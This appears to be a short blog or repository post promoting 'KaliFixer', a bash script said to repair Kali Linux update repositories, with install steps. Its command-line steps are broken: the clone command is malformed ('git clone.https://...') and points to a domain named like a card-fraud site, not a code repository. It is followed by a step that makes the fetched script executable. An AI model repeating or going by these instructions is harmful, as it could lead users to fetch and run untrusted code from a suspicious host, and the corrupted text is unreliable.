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Dec 5, 2020


KaliFixer is a bash script created to help newbies in Kali Linux. We have all been there that dreaded moment when we try to update Kali Linux using apt-get only to be presented with update errors. Don’t worry KaliFixer is on hand !.
This script will first find the version of Kali using kernel headers of your Kali install once the version of Kali Linux is found it will update sources.list with the correct repositories for Kali to function correctly. Enjoy if this script was useful to use consider sharing it with friends & on social media.

  1. Kali Linux
  2. Bash shell
  3. git (optional)
Installing from web browser
  1. Download the zip file using the “Clone or download” button.
  2. Navigate to the download directory and unzip the archive.
  3. Open a terminal and navigate to the target directory.
    cd ~/Downloads/KaliFixer
  4. Execute the script.
Installing from command line
  1. Open a terminal and enter the following commands.
cd ~/Downloads

git clone.https://legitcarders.ws/

cd KaliFixer

chmod +x KaliFixer.sh

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